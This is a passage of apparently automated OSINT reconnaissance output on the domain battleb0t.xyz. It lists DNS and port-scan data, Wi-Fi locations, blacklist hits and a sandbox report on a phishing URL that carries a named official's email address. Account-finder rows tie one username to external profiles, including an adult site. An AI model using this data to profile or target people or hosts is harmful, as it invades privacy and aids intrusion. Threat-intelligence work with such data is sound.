"c:\\users\\%osuser%\\appdata\\local\\microsoft\\internet explorer\\recovery\\high\\active\\{6e883629-ebb8-11ed-9999-080027239584}.dat"\n "iexplore.exe" writes file "c:\\users\\%osuser%\\appdata\\local\\temp\\~dfa2a380ccf94f2bd9.tmp"\n "iexplore.exe" writes file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\windows\\temporary internet files\\content.ie5\\37nu00gp\\favicon[3].ico"'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'infor |
| 2023-05-12 03:00:26 | Affiliate - Email Address | No | E-Mail Address Extractor | 0 | 0 | 4 | 0 | None | aes256-gcm@openssh.com | {"operating_system": {"product": "Linux", "vendor": "Debian", "version": "10.2", "other": {"family": "Linux"}, "uniform_resource_identifier": "cpe:2.3:o:debian:debian_linux:10.2:*:*:*:*:*:*:*", "part": "o"}, "last_updated_at": "2023-05-11T13:12:22.896Z", "ip": "64.226.81.43", "labels": ["remote-access"], "location_updated_at": "2023-05-04T23:08:56.702518Z", "autonomous_system_updated_at": "2023-05-04T23:08:56.702593Z", "location": {"province": "Hesse", "city": "Frankfurt am Main", "country": "Germany", "coordinates": {"latitude": 50.11552, "longitude": 8.68417}, "postal_code": "60306", "country_code": "DE", "timezone": "Europe/Berlin", "continent": "Europe"}, "dns": {"records": {"kvydol.easypanel.host": {"record_type": "A", "resolved_at": "2023-05-05T17:01:10.039852254Z"}, "kekw.battleb0t.xyz": {"record_type": "A", "resolved_at": "2023-05-09T21:51:41.360251198Z"}, "wordpress-971118-3396556.cloudwaysapps.com": {"record_type": "A", "resolved_at": "2023-05-02T09:46:47.851165352Z"}}, "names": ["kvydol.easypanel.host", "kekw.battleb0t.xyz", "wordpress-971118-3396556.cloudwaysapps.com"], "reverse_dns": {"resolved_at": "2023-04-25T12:49:47.725442827Z", "names": ["971118.cloudwaysapps.com"]}}, "services": [{"transport_protocol": "TCP", "_encoding": {"banner": "DISPLAY_UTF8", "banner_hex": "DISPLAY_HEX"}, "labels": ["remote-access"], "truncated": false, "service_name": "SSH", "_decoded": "ssh", "banner_hashes": ["sha256:989054422845f7fb4a0f578fbb62a589973974ff9b7310e0eee11f9d1819efdb"], "source_ip": "167.94.145.60", "extended_service_name": "SSH", "observed_at": "2023-05-11T11:58:34.839347829Z", "banner_hex": "5353482d322e302d4f70656e5353485f372e3970312044656269616e2d31302b64656231307532", "perspective_id": "PERSPECTIVE_ORANGE", "transport_fingerprint": {"raw": "65160,64,true,MSTNW,1460,false,false", "os": "CentOS", "id": 262}, "banner": "SSH-2.0-OpenSSH_7.9p1 Debian-10+deb10u2", "port": 22, "ssh": {"server_host_key": {"fingerprint_sha256": "0172e87daef36c52da4bd5592787fb64e976f73f4f61384a12164ac56f2ce5a1", "rsa_public_key": {"_encoding": {"modulus": "DISPLAY_BASE64", "exponent": "DISPLAY_BASE64"}, "length": 2048, "modulus": "uPxDpRdIrA/iz2ExEgRAxKmXST2zSxUUASzEIsL6O2PTrSNc6umFNFt/dHdxbK0YoU5gp4vR8iK16J/is3qdC1O0ZbGjQDlTCf7Ot9E/wR2JFzowSc1s9mpCkXPL2tjFtwBDcuHkmqou6ryP5VE5ak4jNCg57zigC0YIUbaIQBZ2jxMULPFDZH04Sm7BCi6dspyzcLPQj8OZRf2GyAISVhP0sEJYaziXVgNTRAQlqfYIDf9Nzlq1NseWj/r6MQ8+fir5bRq/WXlDIO3L0kx/XXBOQazwt1JhrESalbK3qpruuXFPUsHNFo5uT3KgeXHGYW3PgarxkIAvPDmJRHKYqQ==", "exponent": "AAEAAQ=="}}, "algorithm_selection": {"server_to_client_alg_group": {"mac": "hmac-sha2-256", "cipher": "aes128-ctr", "compression": "none"}, "host_key_algorithm": "ssh-rsa", "client_to_server_alg_group": {"mac": "hmac-sha2-256", "cipher": "aes128-ctr", "compression": "none"}, "kex_algorithm": "curve25519-sha256@libssh.org"}, "kex_init_message": {"host_key_algorithms": ["rsa-sha2-512", "rsa-sha2-256", "ssh-rsa"], "client_to_server_compression": ["none", "zlib@openssh.com"], "server_to_client_ciphers": ["chacha20-poly1305@openssh.com", "aes128-ctr", "aes192-ctr", "aes256-ctr", "aes128-gcm@openssh.com", "aes256-gcm@openssh.com"], "client_to_server_macs": ["umac-64-etm@openssh.com", "umac-128-etm@openssh.com", "hmac-sha2-256-etm@openssh.com", "hmac-sha2-512-etm@openssh.com", "hmac-sha1-etm@openssh.com", "umac-64@openssh.com", "umac-128@openssh.com", "hmac-sha2-256", "hmac-sha2-512", "hmac-sha1"], "first_kex_follows": false, "kex_algorithms": ["curve25519-sha256", "curve25519-sha256@libssh.org", "ecdh-sha2-nistp256", "ecdh-sha2-nistp384", "ecdh-sha2-nistp521", "diffie-hellman-group-exchange-sha256", "diffie-hellman-group16-sha512", "diffie-hellman-group18-sha512", "diffie-hellman-group14-sha256", "diffie-hellman-group14-sha1"], "server_to_client_compression": ["none", "zlib@openssh.com"], "client_to_server_ciphers": ["chacha20-poly1305@openssh.com", "aes128-ctr", "aes192-ctr", "aes256-ctr", "aes128-gcm@openssh.com", "aes256-gcm@openssh.com"], "server_to_client_macs": ["umac-64-etm@openssh.com", "umac-128-etm@openssh.com", "hmac-sha2-256-etm@openssh.com", "hmac-sha2-512-etm@openssh.com", "hmac-sha1-etm@openssh.com", "umac-64@openssh.com", "umac-128@openssh.com", "hmac-sha2-256", "hmac-sha2-512", "hmac-sha1"]}, "endpoint_id": {"comment": "Debian-10+deb10u2", "_encoding": {"raw": "DISPLAY_UTF8"}, "protocol_version": "2.0", "software_version": "OpenSSH_7.9p1", "raw": "SSH-2.0-OpenSSH_7.9p1 Debian-10+deb10u2"}, "hassh_fingerprint": "b12d2871a1189eff20364cf5333619ee"}, "software": [{"source": "OSI_APPLICATION_LAYER", "product": "openssh", "other": {"comment": "Debian-10+deb10u2"}}, {"source": "OSI_TRANSPORT_LAYER", "product": "linux", "part": "o", "uniform_resource_identifier": "cpe:2.3:o:*:linux:*:*:*:*:*:*:*:*"}, {"product": "OpenSSH", "vendor": "OpenBSD", "version": "7.9", "update": "p1", "source": "OSI_APPLICATION_LAYER", "part": "a", "uniform_resource_identifier": "cpe:2.3:a:openbsd:openssh:7.9:p1:*:*:*:*:*:*", "other": {"family": "OpenSSH"}}, {"product": "Linux", "vendor": "Debian", "version": "10.2", "source": "OSI_APPLICATION_LAYER", "other": {"family": "Linux"}, "uniform_resource_identifier": "cpe:2.3:o:debian:debian_linux:10.2:*:*:*:*:*:*:*", "part": "o"}]}, {"transport_protocol": "TCP", "_encoding": {"banner": "DISPLAY_UTF8", "banner_hex": "DISPLAY_HEX"}, "http": {"request": {"headers": {"_encoding": {"User_Agent": "DISPLAY_UTF8", "Accept": "DISPLAY_UTF8"}, "User_Agent": ["Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"], "Accept": ["*/*"]}, "method": "GET", "uri": "http://64.226.81.43/"}, "response": {"body": "<!DOCTYPE html>\n<html>\n <iframe src=\"https://cloudways-static-content.s3.us-east-1.amazonaws.com/error_page/maintenance-domain-mapping.html\" frameborder=\"0\" style=\"overflow:hidden;overflow-x:hidden;overflow-y:hidden;height:100%;width:100%;position:absolute;top:0px;left:0px;right:0px;bottom:0px\" height=\"100%\" width=\"100%\"></iframe>\n</html> ", "_encoding": {"body": "DISPLAY_UTF8", "body_hash": "DISPLAY_UTF8"}, "protocol": "HTTP/1.1", "headers": {"_encoding": {"Vary": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Etag": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8"}, "Vary": ["Accept-Encoding"], "Server": ["nginx"], "Connection": ["keep-alive"], "Etag": ["W/\"64217dc5-156\""], "Content_Type": ["text/html"], "Date": ["<REDACTED>"]}, "body_hashes": ["sha256:d5e3078cb88ba53faa1d104c27054d2a8ff92665b4c02144f55489bf5c254016", "sha1:5d4eb7befed38d050a2b1adaa91de040a5beb9bf"], "status_code": 403, "body_hash": "sha1:5d4eb7befed38d050a2b1adaa91de040a5beb9bf", "body_size": 342, "status_reason": "Forbidden"}, "supports_http2": false}, "truncated": false, "service_name": "HTTP", "_decoded": "http", "banner_hashes": ["sha256:888a2d848f3d16b40c32b4ff30abaadaacb398a98d5a44f4a0237b14ce63d529"], "source_ip": "167.248.133.36", "extended_service_name": "HTTP", "observed_at": "2023-05-11T05:48:53.194396164Z", "banner_hex": "485454502f312e312034303320466f7262696464656e0d0a5365727665723a206e67696e780d0a446174653a20203c52454441435445443e0d0a436f6e74656e742d547970653a20746578742f68746d6c0d0a5472616e736665722d456e636f64696e673a206368756e6b65640d0a436f6e6e656374696f6e3a206b6565702d616c6976650d0a566172793a204163636570742d456e636f64696e670d0a455461673a20572f2236343231376463352d313536220d0a436f6e74656e742d456e636f64696e673a20677a69700d0a", "perspective_id": "PERSPECTIVE_NTT", "banner": "HTTP/1.1 403 Forbidden\r\nServer: nginx\r\nDate: <REDACTED>\r\nContent-Type: text/html\r\nTransfer-Encoding: chunked\r\nConnection: keep-alive\r\nVary: Accept-Encoding\r\nETag: W/\"64217dc5-156\"\r\nContent-Encoding: gzip\r\n", "port": 80, "software": [{"product": "nginx", "vendor": "nginx", "source": "OSI_APPLICATION_LAYER", "part": "a", "uniform_resource_identifier": "cpe:2.3:a:f5:nginx:*:*:*:*:*:*:*:*", "other": {"family": "nginx"}}]}, {"tls": {"version_selected": "TLSv1_3", "certificates": {"_encoding": {"chain_fps_sha_256": "DISPLAY_HEX", "leaf_fp_sha_256": "DISPLAY_HEX"}, "chain_fps_sha_256": ["7fa4ff68ec04a99d7528d5085f94907f4d1dd1c5381bacdc832ed5c960214676", "68b9c761219a5b1f0131784474665db61bbdb109e00f05ca9f74244ee5f5f52b", "d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef4"], "chain": [{"issuer_dn": "C=US, ST=New Jersey, L=Jersey City, O=The USERTRUST Network, CN=USERTrust RSA Certification Authority", "subject_dn": "C=GB, ST=Greater Manchester, L=Salford, O=Sectigo Limited, CN=Sectigo RSA Domain Validation Secure Server CA", "fingerprint": "7fa4ff68ec04a99d7528d5085f94907f4d1dd1c5381bacdc832ed5c960214676"}, {"issuer_dn": "C=GB, ST=Greater Manchester, L=Salford, O=Comodo CA Limited, CN=AAA Certificate Services", "subject_dn": "C=US, ST=New Jersey, L=Jersey City, O=The USERTRUST Network, CN=USERTrust RSA Certification Authority", "fingerprint": "68b9c761219a5b1f0131784474665db61bbdb109e00f05ca9f74244ee5f5f52b"}, {"issuer_dn": "C=GB, ST=Greater Manchester, L=Salford, O=Comodo CA Limited, CN=AAA Certificate Services", "subject_dn": "C=GB, ST=Greater Manchester, L=Salford, O=Comodo CA Limited, CN=AAA Certificate Services", "fingerprint": "d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef4"}], "leaf_data": {"pubkey_algorithm": "RSA", "public_key": {"key_algorithm": "RSA", "rsa": {"_encoding": {"modulus": "DISPLAY_BASE64", "exponent": "DISPLAY_BASE64"}, "length": 256, "modulus": "0TpnPayT/qE4F6J4qzOiK7JhnrAo9bFLNo2svrHA/v0LaIOAybJrnc5AyyYwgS6PTnc5WMsgwlVeIH5TInjmeEsEinXaSlGOrsV7Gm/ZW+7PMzYrK4KMP7g5Pv95Q5JU7FTQvxHAzRGxkvPDzcyogoNJIk1KXgVLPxdUyd+B1UFVrTMrqAkIf0M1HRzdWlOHv+OEsQ2QjcnXP0mIdDF6sbDns9klIt09P59g0zL++OZSIkvbIRKyvkKcmp+73HQRF0pjn2SY2RJKMExBzgIlPDKzcHLqDMPRl2zP8TcIdzRjF/X4rRYa64yxqmMYIDs4WPnhkpo7c5uTK7f4TFIU1Q==", "exponent": "AAEAAQ=="}, "fingerprint": "e577b60ecc733cd981273f877b2ab03d93986490630d699801165ebbec0a48cf"}, "subject_dn": "CN=*.cloudwaysapps.com", "pubkey_bit_size": 2048, "fingerprint": "46c14572bed6bb1c8797e7a0292d295e561d717b22535af514608f0d2fe40802", "issuer_dn": "C=GB, ST=Greater Manchester, L=Salford, O=Sectigo Limited, CN=Sectigo RSA Domain Validation Secure Server CA", "names": ["*.cloudwaysapps.com", "cloudwaysapps.com"], "tbs_fingerprint": "f9537ad843dfc5f6c9ec168dd4c17c3b |
| 2023-05-12 03:42:18 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | Eminent (Net ID: 00:14:5C:87:88:F8) | 50.8897, 6.0563 |
| 2023-05-12 03:00:56 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.91): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 03:12:53 | Raw Data from RIRs | No | numverify | 0 | 0 | 3 | 0 | None | {u'international_format': u'+14806242505', u'local_format': u'4806242505', u'number': u'14806242505', u'valid': True, u'line_type': u'landline', u'location': u'Phoenix', u'country_code': u'US', u'carrier': u'', u'country_name': u'United States of America', u'country_prefix': u'+1'} | +14806242505 |
| 2023-05-12 03:18:54 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | tsunami (Net ID: 00:0D:29:AC:D8:F1) | 32.8608, -79.9746 |
| 2023-05-12 03:18:51 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | UTAAPC (Net ID: 00:02:6F:3C:D0:53) | 37.7642, -122.3993 |
| 2023-05-12 02:53:39 | Open TCP Port Banner | No | Censys | 0 | 0 | 2 | 0 | None | HTTP/1.1 404 Not Found
Connection: keep-alive
Content-Length: 5142
Server: GitHub.com
Content-Type: text/html; charset=utf-8
ETag: W/"64556a8c-239b"
Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; img-src data:; connect-src 'self'
Content-Encoding: gzip
X-GitHub-Request-Id: 8A7E:0CB6:1A24B9D:28318AF:645D907B
Accept-Ranges: bytes
Date: <REDACTED>
Via: 1.1 varnish
Age: 151
X-Served-By: cache-chi-klot8100035-CHI
X-Cache: HIT
X-Cache-Hits: 1
X-Timer: S1683853586.391035,VS0,VE4
Vary: Accept-Encoding
X-Fastly-Request-ID: b0816cb365cc757f5f8cced0af110244f06dfba5
| 185.199.108.153 |
| 2023-05-12 03:17:05 | Account on External Site | No | Account Finder | 0 | 0 | 1 | 0 | None | Gravatar (Category: images)
http://en.gravatar.com/profiles/ayshoo | ayshoo |
| 2023-05-12 03:00:56 | Co-Hosted Site | No | HackerTarget | 2 | 0 | 2 | 0 | None | 00why00.github.io | 185.199.111.153 |
| 2023-05-12 02:54:22 | Web Content | No | Web Spider | 1 | 0 | 2 | 0 | None | <!DOCTYPE html>
<html>
<iframe src="https://cloudways-static-content.s3.us-east-1.amazonaws.com/error_page/maintenance-domain-mapping.html" frameborder="0" style="overflow:hidden;overflow-x:hidden;overflow-y:hidden;height:100%;width:100%;position:absolute;top:0px;left:0px;right:0px;bottom:0px" height="100%" width="100%"></iframe>
</html> | http://kekw.battleb0t.xyz/jar |
| 2023-05-12 03:18:54 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | linksys_SES_39246 (Net ID: 00:1C:10:3F:F6:58) | 32.8608, -79.9746 |
| 2023-05-12 03:18:49 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | 101 (Net ID: 00:01:03:79:1F:E4) | 34.0544, -118.244 |
| 2023-05-12 03:01:37 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.145): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 02:44:23 | SSL Certificate - Issued to | No | SSL Certificate Analyzer | 1 | 0 | 2 | 0 | None | C=US,ST=California,L=San Francisco,O=GitHub\, Inc.,CN=*.github.io | 185.199.109.153 |
| 2023-05-12 03:08:49 | Affiliate - IP Address | No | DNS Look-aside | 1 | 0 | 3 | 0 | None | 35.229.48.111 | 35.229.48.116 |
| 2023-05-12 03:03:41 | Co-Hosted Site - Domain Name | No | DNS Resolver | 0 | 0 | 3 | 0 | None | github.io | 01100111-01101001-01110100.github.io |
| 2023-05-12 03:00:54 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.85): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 03:18:54 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | ELSA (Net ID: 00:02:2D:20:CF:48) | 50.1188, 8.6843 |
| 2023-05-12 03:17:05 | Account on External Site | No | Account Finder | 0 | 0 | 1 | 0 | None | Pornhub Users (Category: XXXPORNXXX)
https://www.pornhub.com/users/ayshoo | ayshoo |
| 2023-05-12 02:54:15 | Linked URL - External | No | Web Spider | 0 | 0 | 3 | 0 | None | https://cdn.discordapp.com/avatars/710143953533403226/02ca825e4901e74c2c2d6f8e59341325.png?size=512 | https://nwapi2.battleb0t.xyz/ |
| 2023-05-12 02:45:57 | Malicious IP Address | Yes | MetaDefender | 0 | 1 | 2 | 0 | None | webroot.com [172.67.135.9] | 172.67.135.9 |
| 2023-05-12 02:55:11 | Open TCP Port | No | Censys | 0 | 0 | 2 | 0 | None | 87.248.157.102:21 | 87.248.157.102 |
| 2023-05-12 03:08:50 | Affiliate - IP Address | No | DNS Look-aside | 1 | 0 | 3 | 0 | None | 35.229.48.119 | 35.229.48.116 |
| 2023-05-12 02:56:58 | Raw Data from RIRs | No | Hybrid Analysis | 1 | 0 | 3 | 0 | None | [{u'subsystem': None, u'classification_tags': [u'phishing'], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 3, u'threat_score': 100, u'compromised_hosts': [], u'environment_id': 120, u'major_os_version': None, u'submit_name': u'https://calzedokondor.co/vitalie.porcescu@ansa.gov.md', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\IsoScope_d54_IESQMMUTEX_0_519"\n "Local\\InternetShortcutMutex"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "IsoScope_d54_IESQMMUTEX_0_519"\n "UpdatingNewTabPageData"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "IsoScope_d54_IESQMMUTEX_0_303"\n "IsoScope_d54_IESQMMUTEX_0_331"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "IsoScope_d54_ConnHashTable<3412>_HashTable_Mutex"\n "Local\\VERMGMTBlockListFileMutex"\n "Local\\ZonesLockedCacheCounterMutex"\n "Local\\ZonesCacheCounterMutex"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "IsoScope_d54_IE_EarlyTabStart_0xebc_Mutex"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_3412"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "\\Sessions\\1\\BaseNamedObjects\\UpdatingNewTabPageData"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\!BrowserEmulation!SharedMemory!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\VERMGMTBlockListFileMutex"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"calzedokondor.co"\n "cdnjs.cloudflare.com"\n "code.jquery.com"\n "eon.nerz.cloudns.nz"\n "maxcdn.bootstrapcdn.com"'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")\n Antivirus vendors marked dropped file "Tar34FF.tmp" as clean (type is "data")\n Antivirus vendors marked dropped file "Tar3442.tmp" as clean (type is "data")'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"185.174.174.220:443"\n "35.229.48.116:443"\n "142.251.33.106:443"\n "69.16.175.10:443"\n "142.251.211.234:443"\n "104.18.22.52:443"\n "104.18.10.207:443"\n "104.17.24.14:443"\n "104.197.4.231:443"\n "172.64.203.28:443"'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-5', u'name': u'Drops cabinet archive files', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'"Cab34FE.tmp" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62919 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"\n "Cab3441.tmp" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62919 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62919 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-37', u'name': u'Drops files inside appdata directory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'Dropped file: "RXDGIQPF.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\RXDGIQPF.txt]- [targetUID: 00000000-00003844]\n Dropped file: "MA7ZTF7R.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\MA7ZTF7R.txt]- [targetUID: 00000000-00003412]'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"urlblockindex_1_.bin" has type "data"- [targetUID: N/A]\n "Tar34FF.tmp" has type "data"- Location: [%TEMP%\\Tar34FF.tmp]- [targetUID: 00000000-00003844]\n "free.min_1_.css" has type "ASCII text with very long lines"- [targetUID: N/A]\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\77EC63BDA74BD0D0E0426DC8F8008506]- [targetUID: 00000000-00003844]\n "jquery-3.2.1.slim.min_1_.js" has type "ASCII text with very long lines"- [targetUID: N/A]\n "Tar3442.tmp" has type "data"- Location: [%TEMP%\\Tar3442.tmp]- [targetUID: 00000000-00003844]\n "_5BFAE1C3-60BC-11ED-968F-08002744A090_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "RecoveryStore._C7A4F1AE-D920-11E7-B48D-080027D44A30_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "bootstrap.min_1_.js" has type "ASCII text with very long lines"- [targetUID: N/A]\n "jquery.min_1_.js" has type "ASCII text with very long lines"- [targetUID: N/A]\n "favicon_6_.ico" has type "MS Windows icon resource - 1 icon 16x16 32 bits/pixel"- [targetUID: N/A]\n "~DF0E5AFAE17F79F751.TMP" has type "data"- Location: [%TEMP%\\~DF0E5AFAE17F79F751.TMP]- [targetUID: 00000000-00003412]\n "search__0633EE93-D776-472f-A0FF-E1416B8B2E3A_.ico" has type "PNG image data 16 x 16 4-bit colormap non-interlaced"- [targetUID: N/A]\n "~DF8B6A0A3E86D531A7.TMP" has type "data"- Location: [%TEMP%\\~DF8B6A0A3E86D531A7.TMP]- [targetUID: 00000000-00003412]\n "search_1_.json" has type "JSON data"- [targetUID: N/A]\n "dberr.txt" has type "ASCII text with CRLF line terminators"- Location: [%WINDIR%\\System32\\catroot2\\dberr.txt]- [targetUID: 00000000-00003844]\n "RXDGIQPF.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\RXDGIQPF.txt]- [targetUID: 00000000-00003844]\n "free-v4-shims.min_1_.css" has type "ASCII text with very long lines"- [targetUID: N/A]\n "jquery-3.1.1.min_1_.js" has type "ASCII text with very long lines"- [targetUID: N/A]'}, {u'category': u'Network Related', u'origin': u'Network Traffic', u'identifier': u'network-6', u'name': u'Contacts Random Domain Names', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 5, u'threat_level': 0, u'type': 7, u'description': u'"cdnjs.cloudflare.com" seems to be random'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-3', u'name': u'Found potential URL in binary/memory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 2, u'description': u'Pattern match: "https://calzedokondor.co/vitalie.porcescu@ansa.gov.md"\n Pattern match: "https://calzedokondor.co"\n Heuristic match: "calzedokondor.co"\n Heuristic match: "cdnjs.cloudflare.com"\n Heuristic match: "code.jquery.com"\n Heuristic match: "eon.nerz.cloudns.nz"\n Heuristic match: "maxcdn.bootstrapcdn.com"'}, {u'category': u'General', u'origin': u'File/Memory', u'identifier': u'string-63', u'name': u'Found a potential E-Mail address in binary/memory', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1114', u'threat_level_human': u'suspicious', u'capec_id': None, u'attck_id': u'T1114', u'relevance': 3, u'threat_level': 1, u'type': 2, u'description': u'Pattern match: "vitalie.porcescu@ansa.gov.md"'}, {u'category': u'External Systems', u'origin': u'External System', u'identifier': u'avtest-6', u'name': u'Found an IP/URL artifact that was identified as malicious by at least three reputation engines', u'attck_id_wiki': None, u'threat_level_human': u'suspicious', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 1, u'type': 12, u'description': u'3/90 reputation engines marked "http://calzedokondor.co" as malicious (3% detection rate)\n 3/90 reputation engines marked "https://calzedokondor.co" as malicious (3% detection rate)\n 7/90 reputation engines marked "https://calzedokondor.co/vitalie.porcescu@ansa.gov.md" as malicious (7% detection rate)'}, {u'category': u'External Systems', u'origin': u'External System', u'identifier': u'avtest-0', u'name': u'Sample was identified as malicious by at least one Antivirus engine', u'attck_id_wiki': None, u'threat_level_human': u'suspicious', u'capec_id': None, u'attck_id': None, u'relevance': 0, u'threat_level': 1, u'type': 12, u'description': u'7/90 Antivirus vendors marked sample as malicious (7% detection rate)'}, {u'category': u'External Systems', u'origin': u'External System', u'identifier': u'avtest-5', u'name': u'Sample was identified as malicious by a trusted Antivirus engine', u'attck_id_wiki': None, u'threat_level_human': u'malicious', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 2, u'type': 12, u'description': u'No specific details available'}], u'threat_level': 2, u'size': None, u'job_id': u'636c9fea72902d08670f15f1', u'target_url': None, u'interesting': False, u'error_type': None, u'state': u'SUCCESS', u'entrypoint': None, u'mitre_attcks': [{u'parent': None, u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1114', u'suspicious_identifiers': [], u'attck_id': u'T1114', u'malicious_identifiers': [], u'malicious_identifiers_count': 0, u'technique': u'Email Collection', u'informative_identifiers': [], u'tactic': u'Collection', u'informative_identifiers_count': 0, u'suspicious_identifiers_count': | 35.229.48.116 |
| 2023-05-12 02:44:28 | IP Address | No | DNS Resolver | 0 | 0 | 2 | 0 | None | 104.21.71.14 | fluid.battleb0t.xyz |
| 2023-05-12 03:18:57 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | <no ssid> (Net ID: 00:02:2D:03:B5:60) | 37.780462,-122.390564 |
| 2023-05-12 02:54:00 | Open TCP Port | No | Censys | 0 | 0 | 2 | 0 | None | 104.21.6.166:2053 | 104.21.6.166 |
| 2023-05-12 02:54:15 | HTTP Status Code | No | Web Spider | 0 | 0 | 2 | 0 | None | 200 | www.battleb0t.xyz |
| 2023-05-12 03:19:09 | Account on External Site | No | Account Finder | 0 | 0 | 6 | 0 | None | prv.pl (Category: tech)
https://www.prv.pl/osoba/login | login |
| 2023-05-12 02:45:42 | Physical Location | No | AbstractAPI | 0 | 0 | 2 | 0 | None | San Francisco (South Beach), California, 94107, United States, North America | 185.199.108.153 |
| 2023-05-12 02:50:19 | Physical Location | No | ipstack | 0 | 0 | 3 | 0 | None | United States | 104.196.30.220 |
| 2023-05-12 03:01:33 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.95): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 02:44:07 | Internet Name | No | CertSpotter | 25 | 0 | 1 | 0 | None | nwapi.battleb0t.xyz | battleb0t.xyz |
